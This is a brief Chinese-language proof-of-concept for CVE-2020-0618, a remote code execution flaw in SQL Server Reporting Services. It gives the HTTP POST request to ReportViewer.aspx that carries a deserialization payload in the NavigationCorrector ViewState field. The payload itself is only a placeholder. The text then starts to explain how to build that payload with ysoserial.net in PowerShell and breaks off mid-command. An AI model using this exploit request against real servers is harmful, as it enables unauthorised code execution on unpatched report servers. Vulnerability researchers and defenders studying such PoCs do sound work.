CVE-2020-0618 SQL Server报表服务(CVE-2020-0618)中的RCE 进攻验证(POC) 可以将以下HTTP请求发送到服务器以利用该应用程序: POST /ReportServer/pages/ReportViewer.aspx HTTP/1.1 Host: target Content-Type: application/x-www-form-urlencoded Content-Length: X NavigationCorrector$PageState=NeedsCorrection&NavigationCorrector$ViewState=[PayloadHere]&__VIEWSTATE= 可以在PowerShell中使用以下命令来使用ysoserial.net工具生成有效负载:ysoserial.net工具: : $command =